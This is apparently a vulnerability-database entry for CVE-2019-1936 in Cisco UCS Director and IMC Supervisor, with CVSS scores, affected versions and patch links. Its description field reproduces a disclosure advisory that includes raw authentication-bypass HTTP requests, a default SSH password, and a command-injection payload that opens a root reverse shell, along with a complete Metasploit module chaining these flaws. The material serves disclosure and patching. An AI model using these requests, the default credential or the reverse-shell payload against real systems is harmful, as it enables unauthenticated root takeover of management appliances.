ID

VAR-201908-0545


CVE

CVE-2019-1936


TITLE

plural Cisco Vulnerability related to input validation in products

Trust: 0.8

sources: JVNDB: JVNDB-2019-008542

DESCRIPTION

A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an authenticated, remote attacker to execute arbitrary commands on the underlying Linux shell as the root user. Exploitation of this vulnerability requires privileged access to an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by logging in to the web-based management interface with administrator privileges and then sending a malicious request to a certain part of the interface. Cisco UCS Director is a heterogeneous platform for private cloud infrastructure as a service (IaaS). are all products of Cisco (Cisco). The following products and versions are affected: Cisco IMC Supervisor Version 2.1, Version 2.2.0.0 to Version 2.2.0.6; UCS Director Version 6.0, Version 6.5, Version 6.6.0.0, Version 6.6.1.0, Version 6.7.0.0, Version 6.7.1.0 ; UCS Director Express for Big Data version 3.0, version 3.5, version 3.6, version 3.7.0.0, version 3.7.1.0. It is built using Java and a variety of other technologies and distributed as a Linux based virtual appliance. A demo of the UCS virtual appliance can be freely downloaded from Cisco's website [1]. In addition, there is a default unprivileged user with a known password that can login via SSH and execute commands on the virtual appliance provided by Cisco. Two Metasploit modules were released with this advisory, one that exploits the authentication bypass and command injection, and another that exploits the default SSH password. However, Agile Information Security only tested Cisco UCS Director. Agile Information Security would like to thank Accenture Security (previously iDefense) [5] for handling the disclosure process with Cisco. It is a heterogeneous management platform that features multivendor task libraries with more than 2500 out-of-the-box workflow tasks for end-to-end converged and hyperconverged stack automation. You can extend your capabilities to: - Automate provisioning, orchestration, and management of Cisco and third-party infrastructure resources - Order resources and services from an intuitive self-service portal - Automate security and isolation models to provide repeatable services - Standardize and automate multitenant environments across shared infrastructure instances" >> Technical details: #1 Vulnerability: Web Interface Authentication Bypass / CWE-287 CVE-2019-1937 Cisco Bug ID: CSCvp19229 [2] Risk Classification: Critical Attack Vector: Remote Constraints: No authentication required Affected versions: confirmed in Cisco UCS Director versions 6.6.0 and 6.7.0, see [2] for Cisco's list of affected versions UCS exposes a management web interface on ports 80 and 443 so that users of UCS can perform cloud management functions. Due to a number of coding errors and bad practices, it is possible for an unauthenticated attacker to obtain an administrative session by bypassing authentication. The following sequence of requests and responses shows the authentication bypass works. 1.1) First we send a request to ClientServlet to check our authentication status: GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ X-Requested-With: XMLHttpRequest ... to which the server responds with a redirect to the login page since we are not authenticated: HTTP/1.1 302 Found Location: https://10.0.3.100/app/ui/login.jsp Content-Length: 0 Server: Web 1.2) We now follow the redirection to obtain a JSESSIONID cookie: GET /app/ui/login.jsp HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ X-Requested-With: XMLHttpRequest And the server responds with our cookie: HTTP/1.1 200 OK Set-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC745; Path=/app; Secure; HttpOnly Server: Web 1.3) Then we repeat the request from 1.1), but this time with the JSESSIONID cookie obtained in 1.2): GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74; X-Requested-With: XMLHttpRequest ... and we still get redirected to the login page, as in step 1.1): HTTP/1.1 302 Found Location: https://10.0.3.100/app/ui/login.jsp Content-Length: 0 Server: Web 1.4) To completely bypass authentication, we just need to send the JSESSIONID cookie with added X-Starship-UserSession-Key and X-Starship-Request-Key HTTP headers set to random values: GET /app/ui/ClientServlet?apiName=GetUserInfo HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/ X-Starship-UserSession-Key: ble X-Starship-Request-Key: bla Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74; X-Requested-With: XMLHttpRequest HTTP/1.1 200 OK Set-Cookie: JSESSIONID=971D41B487F637DA84FCAF9E97A479429D4031F465DA445168A493254AA104E3; Path=/app; Secure; HttpOnly Connection: close Server: Web Content-Length: 428 {"productaccess_id":0,"loginName":"admin","productId":"cloupia_service_portal","accessLevel":null,"isEulaAccepted":false,"eulaAcceptTime":null,"eulaSrcHost":null,"restKey":"bla","allowedOperations":null,"userType":null,"server":null,"domainName":null,"suspend":false,"starshipUserId":null,"starshipUserLocale":null,"isAdminPasswordReset":true,"profileId":0,"credentialId":"","isClassicUIEnabled":false,"starshipSessionId":"ble"} ... and just like that, we can see from the information the server returned that we are logged in as the "admin" user! From now on, we need to use the new JSESSIONID cookie returned by the server in 1.4) to have full administrative access to the UCS web interface. To summarise, our exploit needs to: a) obtain a JSESSIONID cookie b) "authenticate" it by sending a request to ClientServlet with the X-Starship-UserSession-Key and X-Starship-Request-Key HTTP headers set to random values c) use the new JSESSIONID cookie returned in b) as the "admin" authenticated cookie In some cases, the server will authenticate the old cookie and not return a new one, but the effect is the same - the "old" JSESSIONID cookie will be authenticated as an "admin" cookie. Let's dig into the decompiled code, and see what is happening under the hood. All the coding errors that make this possible are in the class com.cloupia.client.web.auth.AuthenticationFilter, which as a javax.servlet.Filter subclass whose doFilter() function is invoked on every request that the server receives (as configured by the web application). A snippet of com.cloupia.client.web.auth.AuthenticationFilter.doFilter() is shown below, with comments preceded with ^^^: public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) { (...) httpRequest = (HttpServletRequest)request; logger.debug("doFilter url: " + httpRequest.getRequestURL().toString()); boolean isAuthenticated = this.authenticateUser(httpRequest); ^^^ 1.5) invokes authenticateUser() (function shown below) String samlLogoutRequest; if(!isAuthenticated) { ^^^ 1.6) if authenticateUser() returns false, we go into this branch samlLogoutRequest = request.getParameter("SAMLResponse"); logger.info("samlResponse-->" + samlLogoutRequest); if(samlLogoutRequest != null) { this.handleSAMLReponse(request, response, chain, samlLogoutRequest); } else { ^^^ 1.7) if there is no SAMLResponse HTTP parameter, we go into this branch HttpSession session; ProductAccess userBean; String requestedUri; if(this.isStarshipRequest(httpRequest)) { ^^^ 1.8) checks if isStarshipRequest() returns true (function shown below) session = null != httpRequest.getSession(false)?httpRequest.getSession(false):httpRequest.getSession(true); userBean = (ProductAccess)session.getAttribute("USER_IN_SESSION"); if(userBean == null) { ^^^ 1.9) if there is no session server side for this request, follow into this branch... try { userBean = new ProductAccess(); userBean.setCredentialId(""); userBean.setAdminPasswordReset(true); userBean.setProductId("cloupia_service_portal"); userBean.setProfileId(0); userBean.setRestKey(httpRequest.getHeader("X-Starship-Request-Key")); userBean.setStarshipUserId(httpRequest.getHeader("X-Starship-UserName-Key")); userBean.setLoginName("admin"); ^^^ 1.10) and create a new session with the user as "admin"! userBean.setStarshipSessionId(httpRequest.getHeader("X-Starship-UserSession-Key")); requestedUri = httpRequest.getHeader("X-Starship-UserRoles-Key"); userBean.setAccessLevel(requestedUri); if(requestedUri != null && requestedUri.equalsIgnoreCase("admin")) { AuthenticationManager authmgr = AuthenticationManager.getInstance(); userBean.setAccessLevel("Admin"); authmgr.evaluateAllowedOperations(userBean); } session.setAttribute("USER_IN_SESSION", userBean); session.setAttribute("DEFAULT_URL", STARSHIP_DEFAULT_URL); logger.info("userBean:" + userBean.getAccessLevel()); } catch (Exception var12) { logger.info("username/password wrong for rest api access - " + var12.getMessage()); } logger.info("userBean: " + userBean.getAccessLevel()); } chain.doFilter(request, response); (...) } As it can be read in the inline comments in the function above, our first hurdle at 1.5) is to make authenticateUser() return false: private boolean authenticateUser(HttpServletRequest request) { boolean isValidUser = false; HttpSession session = null; session = request.getSession(false); ^^^ 1.11) get the session for this request if(session != null) { ProductAccess user = (ProductAccess)session.getAttribute("USER_IN_SESSION"); if(user != null) { isValidUser = true; if(this.isStarshipRequest(request) && !user.isStarshipAccess(request.getHeader("X-Starship-UserSession-Key"))) { isValidUser = false; } else { logger.debug("AuthenticationFilter:authenticateUser - User " + user.getLoginName() + " has been previously authenticated"); } } } else { logger.info("AuthenticationFilter:authenticateUser - session is null"); ^^^ 1.12) no session found, return isValidUser which is false as set at the start of the function } return isValidUser; } This is easily done, and it works as expected - we do not have a session, so at 1.11) the session is null, and then we go into 1.12) which makes the function return false. We now go back to the doFilter() function, and go into the branch in 1.6). As we have not sent a SAMLResponse HTTP parameter, we follow into the 1.7) branch. Now we get to the critical part in 1.8). Here, isStarshipRequest() is invoked, and if it returns true, the server will create an "admin" session for us... private boolean isStarshipRequest(HttpServletRequest httpRequest) { return null != httpRequest.getHeader("X-Starship-UserSession-Key") && null != httpRequest.getHeader("X-Starship-Request-Key"); } isStarshipRequest() is shown above, and clearly the only thing we need to do to make it return true is to set the X-Starship-UserSession-Key and X-Starship-Request-Key HTTP headers. We then follow into 1.9) and 1.10), and we get our administrative session without having any credentials at all! Moreover, the session is completely stealthy and invisible to other users, as it does not appear in Administration -> Users and Groups -> All Users Login History nor in Administration -> Users and Groups -> Current Online Users. #2 Vulnerability: Default password for 'scpuser' / CWE-798 CVE-2019-1935 Cisco Bug ID: CSCvp19251 [3] Risk Classification: Critical Attack Vector: Remote Constraints: requires auth, does not, etc Affected versions: confirmed in Cisco UCS Director versions 6.6.0 and 6.7.0, see [3] for Cisco's list of affected versions The UCS virtual appliance is configured with a user 'scpuser' that is supposed to be used for scp file transfer between UCS appliances and other Cisco modules. According to Cisco's documentation [7]: "An SCP user is used by server diagnostics and tech support upload operations for transferring files to the Cisco IMC Supervisor appliance using the SCP protocol. An scp user account cannot be used to login to the Cisco IMC Supervisor UI or the shelladmin." The web interface contains functionality to change the user password for the 'scpuser' in Administration -> Users and Groups -> SCP User Configuration, and in this page it says: "The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin" Apparently this is not true and not only the user can log in via SSH per default, but it does so with a default password of 'scpuser' if it not changed by the administrator after installation: UCS > ssh scpuser@10.0.3.100 Password: <scpuser> [scpuser@localhost ~]$ whoami scpuser #3 Vulnerability: Authenticated command injection via the web interface as root (CWE-78) CVE-2019-1936 Cisco Bug ID: CSCvp19245 [4] Risk Classification: Critical Attack Vector: Remote Constraints: requires authentication to the UCS web interface Affected versions: confirmed in Cisco UCS Director versions 6.6 and 6.7, see [4] for Cisco's list of affected versions As shown in #2, the web interface contains functionality to change the user password for the 'scpuser' in Administration -> Users and Groups -> SCP User Configuration. This is handled by the Java class com.cloupia.feature.cimc.forms.SCPUserConfigurationForm in doFormSubmit(), which is shown below, with my markers and comments preceded with ^^^: public FormResult doFormSubmit(String user, ReportContext context, String formId, FormFieldData[] data) throws Exception { logger.info((Object)"doFormSubmit invoked "); FormResult result = this.validateForm(context, this.getDefinition(), formId, data, true); if (result.getStatus() == 0) { try { SCPUserConfig existingConfig; FormFieldDataList datalist = new FormFieldDataList(data); String password = datalist.getById(FIELD_ID_PASSWORD).getValue(); ^^^ 3.1) gets "password" from the form sent by the user SCPUserConfig newSCPUserConfig = new SCPUserConfig(); newSCPUserConfig.setPassword(password); if ("**********".equals(password) && (existingConfig = CIMCPersistenceUtil.getSCPUserConfig()) != null) { newSCPUserConfig.setPassword(existingConfig.getPassword()); } CIMCPersistenceUtil.setSCPUserConfig(newSCPUserConfig); Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "echo -e \"" + password + "\\n" + password + "\" | (passwd --stdin " + "scpuser" + ")"}); ^^^ 3.2) runs /bin/sh with "password" argument p.waitFor(); datalist.getById(FIELD_ID_PASSWORD).setValue("**********"); result.setStatus(2); result.setStatusMessage(RBUtil.getString((String)"CIMCControllerFeature.form.scpuser.success.label")); return result; } catch (Exception ex) { result.setStatusMessage(ex.getMessage()); result.setStatus(1); return result; } } return result; } } In 3.1) we see that the function gets the "password" field from the from sent by the user, and in 3.2) it passes this input directly to Runtime.getRuntime().exec(), which leads to a clear command injection. This is run as root, as the web server runs as root and superuser access would be necessary anyway to change a password of another user. To obtain a reverse shell, we can send the following payload to ClientServlet, which will then invoke the SCPUserConfigurationForm.doFormSubmit(): POST /app/ui/ClientServlet HTTP/1.1 Host: 10.0.3.100 Referer: https://10.0.3.100/app/ux/index.html X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 945 Cookie: JSESSIONID=C72361B8C66F8FDF871F94C1FC1E07974E9B5B9E1C953D713E4DC305CB2D4CD1 formatType=json&apiName=ExecuteGenericOp&serviceName=InfraMgr&opName=doFormSubmit&opData=%7B%22param0%22%3A%22admin%22%2C%22param1%22%3A%7B%22ids%22%3Anull%2C%22targetCuicId%22%3Anull%2C%22uiMenuTag%22%3A23%2C%22cloudName%22%3Anull%2C%22filterId%22%3Anull%2C%22id%22%3Anull%2C%22type%22%3A10%7D%2C%22param2%22%3A%22scpUserConfig%22%2C%22param3%22%3A%5B%7B%22fieldId%22%3A%22FIELD_ID_USERNAME%22%2C%22value%22%3A%22scpuser%22%7D%2C%7B%22fieldId%22%3A%22FIELD_ID_DESCRIPTION%22%2C%22value%22%3A%22The%20'scpuser'%20will%20be%20configured%20on%20this%20appliance%20in%20order%20to%20enable%20file%20transfer%20operations%20via%20the%20'scp'%20command.%20This%20user%20account%20cannot%20be%20used%20to%20login%20to%20the%20GUI%20or%20shelladmin.%22%7D%2C%7B%22fieldId%22%3A%22FIELD_ID_PASSWORD%22%2C%22value%22%3A%22%60%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%33%2e%39%2f%34%34%34%34%20%30%3e%26%31%60%22%7D%5D%7D In the example above, the FIELD_ID_PASSWORD is set to "`bash -i >& /dev/tcp/10.0.3.9/4444 0>&1`", which returns a reverse shell to host 10.0.3.9 on port 4444 running as root: UCS > nc -lvkp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.0.3.100 55432 received! bash: no job control in this shell [root@localhost inframgr]# whoami root >> Exploitation summary: By chaining vulnerability #1 (authentication bypass) with vulnerability #3 (authenticated command injection as root), it is clear that an unauthenticated attacker with no privileges on the system can execute code as root, leading to total compromise of Cisco UCS Director. >> Vulnerability Fixes / Mitigation: According to Cisco [2] [3] [4] the three vulnerabilities described in this advisory were fixed in the product versions described below: Cisco IMC Supervisor releases 2.2.1.0 and later Cisco UCS Director releases 6.7.2.0 and later (recommended: 6.7.3.0) Cisco UCS Director Express for Big Data releases 3.7.2.0 and later (recommended: 3.7.3.0) >> References: [1] https://www.cisco.com/c/en/us/support/servers-unified-computing/ucs-director-evaluation/model.html [2] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby [3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred [4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj [5] https://www.accenture.com/us-en/service-idefense-security-intelligence [6] https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-director/index.html [7] https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-director/rack-server-guide/6-7/cisco-ucs-director-rack-server-mgmt-guide-67/cisco-ucs-director-rack-server-mgmt-guide-67_chapter_01011.html#task_1599289A49FB49D48486A66A8358A2AD >> Disclaimer: Please note that Agile Information Security (Agile InfoSec) relies on information provided by the vendor when listing fixed versions or products. Agile InfoSec does not verify this information, except when specifically mentioned in this advisory or when requested or contracted by the vendor to do so. Unconfirmed vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerabilities found by Agile Information Security are resolved properly. Agile Information Security Limited does not accept any responsibility, financial or otherwise, from any material losses, loss of life or reputational loss as a result of misuse of the information or code contained or mentioned in this advisory. It is the vendor's responsibility to ensure their products' security before, during and after release to market. All information, code and binary data in this advisory is released to the public under the GNU General Public License, version 3 (GPLv3). For information, code or binary data obtained from other sources that has a license which is incompatible with GPLv3, the original license prevails. For more information check https://www.gnu.org/licenses/gpl-3.0.en.html ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business. -- Pedro Ribeiro Vulnerability and Reverse Engineer / Cyber Security Specialist pedrib@gmail.com PGP: 4CE8 5A3D 133D 78BB BC03 671C 3C39 4966 870E 966C . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco UCS Director Unauthenticated Remote Code Execution', 'Description' => %q{ The Cisco UCS Director virtual appliance contains two flaws that can be combined and abused by an attacker to achieve remote code execution as root. The first one, CVE-2019-1937, is an authentication bypass, that allows the attacker to authenticate as an administrator. This module combines both vulnerabilities to achieve the unauthenticated command injection as root. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-1937' ], # auth bypass [ 'CVE', '2019-1936' ], # command injection [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj' ], [ 'URL', 'FULL_DISC' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_bash', }, 'Targets' => [ [ 'Cisco UCS Director < 6.7.2.0', {} ], ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 21 2019' )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Connect with TLS', true]), OptString.new('TARGETURI', [true, "Default server path", '/']), ]) end def check # can't think of anything better then this res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'), 'method' => 'GET' }) if res and res.code == 302 return Exploit::CheckCode::Detected end return Exploit::CheckCode::Unknown end def exploit # step 1: get a JSESSIONID cookie res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'), 'method' => 'GET' ) if res and (res.code == 200 or res.code == 302) jsession = res.get_cookies.split(';')[0] # step 2: authenticate our cookie as admin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'), 'cookie' => jsession, 'vars_get' => { 'apiName' => 'GetUserInfo' }, 'headers' => { # X-Requested-With and Referer headers are needed, else the server ignores us # The X-Starship headers are the key to this auth bypass vuln, see the References 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/", 'X-Starship-UserSession-Key' => "#{rand_text_alpha(5..12)}", 'X-Starship-Request-Key' => "#{rand_text_alpha(5..12)}" }, 'method' => 'GET' }) if res and res.code == 200 and res.body.include?("admin") if not res.get_cookies.empty? # if the server returns a new cookie, use that jsession = res.get_cookies.split(';')[0] end print_good("#{peer} - Successfully bypassed auth and got our admin JSESSIONID cookie!") # step 3: request our reverse shell payload = %{{"param0":"admin","param1":{"ids":null,"targetCuicId":null,"uiMenuTag":23,"cloudName":null,"filterId":null,"id":null,"type":10},"param2":"scpUserConfig","param3":[{"fieldId":"FIELD_ID_USERNAME","value":"scpuser"},{"fieldId":"FIELD_ID_DESCRIPTION","value":"The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin."},{"fieldId":"FIELD_ID_PASSWORD","value":"`bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 &``"}]}} res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'), 'cookie' => jsession, 'headers' => { # X-Requested-With and Referer headers are needed, else the server ignores us # The X-Starship headers are the key to this auth bypass vuln, see the References 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "https://#{rhost}#{rport == 443 ? "" : ":" + rport}/", }, 'method' => 'POST', 'vars_post' => { 'formatType' => 'json', 'apiName' => 'ExecuteGenericOp', 'serviceName' => 'InfraMgr', 'opName' => 'doFormSubmit', 'opData' => payload } }) if res and res.code == 200 print_good("#{peer} - Shelly is here, press ENTER to start playing with her!") end else fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie") end else fail_with(Failure::Unknown, "#{peer} - Failed to obtain JSESSIONID cookie") end end end

Trust: 2.52

sources: NVD: CVE-2019-1936 // JVNDB: JVNDB-2019-008542 // CNVD: CNVD-2019-42593 // VULHUB: VHN-151798 // VULMON: CVE-2019-1936 // PACKETSTORM: 154239 // PACKETSTORM: 154308

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2019-42593

AFFECTED PRODUCTS

vendor:ciscomodel:ucs directorscope:eqversion:6.6.1.0

Trust: 1.6

vendor:ciscomodel:ucs directorscope:eqversion:6.7.0.0

Trust: 1.6

vendor:ciscomodel:ucs directorscope:eqversion:6.7.1.0

Trust: 1.6

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.7.0.0

Trust: 1.6

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.7.1.0

Trust: 1.6

vendor:ciscomodel:ucs directorscope:eqversion:6.7\(0.0.67265\)

Trust: 1.0

vendor:ciscomodel:ucs directorscope:eqversion:6.6.0.0

Trust: 1.0

vendor:ciscomodel:ucs directorscope:eqversion:6.0.0.0

Trust: 1.0

vendor:ciscomodel:integrated management controller supervisorscope:gteversion:2.2.0.0

Trust: 1.0

vendor:ciscomodel:ucs directorscope:eqversion:6.5.0.0

Trust: 1.0

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.0.0.0

Trust: 1.0

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.5.0.0

Trust: 1.0

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.6.0.0

Trust: 1.0

vendor:ciscomodel:integrated management controller supervisorscope:eqversion:2.1.0.0

Trust: 1.0

vendor:ciscomodel:integrated management controller supervisorscope:lteversion:2.2.0.6

Trust: 1.0

vendor:ciscomodel:integrated management controller supervisorscope: - version: -

Trust: 0.8

vendor:ciscomodel:ucs directorscope: - version: -

Trust: 0.8

vendor:ciscomodel:ucs director express for big datascope: - version: -

Trust: 0.8

vendor:ciscomodel:imc supervisorscope:eqversion:2.1

Trust: 0.6

vendor:ciscomodel:imc supervisorscope:gteversion:2.2.0.0,<=2.2.0.6

Trust: 0.6

vendor:ciscomodel:ucs directorscope:eqversion:6.0

Trust: 0.6

vendor:ciscomodel:ucs directorscope:eqversion:6.5

Trust: 0.6

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.0

Trust: 0.6

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.5

Trust: 0.6

vendor:ciscomodel:ucs director express for big datascope:eqversion:3.6

Trust: 0.6

sources: CNVD: CNVD-2019-42593 // JVNDB: JVNDB-2019-008542 // NVD: CVE-2019-1936

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-1936
value: HIGH

Trust: 1.0

ykramarz@cisco.com: CVE-2019-1936
value: HIGH

Trust: 1.0

NVD: CVE-2019-1936
value: HIGH

Trust: 0.8

CNVD: CNVD-2019-42593
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201908-1719
value: HIGH

Trust: 0.6

VULHUB: VHN-151798
value: HIGH

Trust: 0.1

VULMON: CVE-2019-1936
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2019-1936
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2019-42593
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-151798
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:S/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

ykramarz@cisco.com: CVE-2019-1936
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.2
impactScore: 5.9
version: 3.0

Trust: 1.8

nvd@nist.gov: CVE-2019-1936
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.2
impactScore: 5.9
version: 3.1

Trust: 1.0

sources: CNVD: CNVD-2019-42593 // VULHUB: VHN-151798 // VULMON: CVE-2019-1936 // JVNDB: JVNDB-2019-008542 // CNNVD: CNNVD-201908-1719 // NVD: CVE-2019-1936 // NVD: CVE-2019-1936

PROBLEMTYPE DATA

problemtype:CWE-20

Trust: 1.9

sources: VULHUB: VHN-151798 // JVNDB: JVNDB-2019-008542 // NVD: CVE-2019-1936

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 154308 // CNNVD: CNNVD-201908-1719

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-201908-1719

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-008542

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-151798

PATCH

title:cisco-sa-20190821-imcs-ucs-cmdinjurl:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj

Trust: 0.8

title:Patch for Cisco Integrated Management Controller Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data Input Validation Error Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/192273

Trust: 0.6

title:Cisco Integrated Management Controller , Cisco UCS Director and Cisco UCS Director Express for Big Data Enter the fix for the verification error vulnerabilityurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=97312

Trust: 0.6

sources: CNVD: CNVD-2019-42593 // JVNDB: JVNDB-2019-008542 // CNNVD: CNNVD-201908-1719

EXTERNAL IDS

db:NVDid:CVE-2019-1936

Trust: 3.4

db:PACKETSTORMid:154239

Trust: 2.5

db:PACKETSTORMid:154308

Trust: 1.3

db:JVNDBid:JVNDB-2019-008542

Trust: 0.8

db:CNNVDid:CNNVD-201908-1719

Trust: 0.7

db:CNVDid:CNVD-2019-42593

Trust: 0.6

db:AUSCERTid:ESB-2019.3212

Trust: 0.6

db:VULHUBid:VHN-151798

Trust: 0.1

db:VULMONid:CVE-2019-1936

Trust: 0.1

sources: CNVD: CNVD-2019-42593 // VULHUB: VHN-151798 // VULMON: CVE-2019-1936 // JVNDB: JVNDB-2019-008542 // PACKETSTORM: 154239 // PACKETSTORM: 154308 // CNNVD: CNNVD-201908-1719 // NVD: CVE-2019-1936

REFERENCES

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190821-imcs-ucs-cmdinj

Trust: 2.5

url:http://packetstormsecurity.com/files/154239/cisco-ucs-imc-supervisor-authentication-bypass-command-injection.html

Trust: 2.4

url:https://nvd.nist.gov/vuln/detail/cve-2019-1936

Trust: 1.6

url:http://seclists.org/fulldisclosure/2019/aug/36

Trust: 1.3

url:https://seclists.org/bugtraq/2019/aug/49

Trust: 1.2

url:http://packetstormsecurity.com/files/154308/cisco-ucs-director-unauthenticated-remote-code-execution.html

Trust: 1.2

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1936

Trust: 0.8

url:https://vigilance.fr/vulnerability/cisco-ucs-director-three-vulnerabilities-30177

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2019.3212/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2019-1937

Trust: 0.2

url:https://cwe.mitre.org/data/definitions/20.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.rapid7.com/db/modules/exploit/linux/http/cisco_ucs_rce/

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190821-imcs-ucs-authby

Trust: 0.1

url:https://www.accenture.com/us-en/service-idefense-security-intelligence

Trust: 0.1

url:https://10.0.3.100/app/ux/index.html

Trust: 0.1

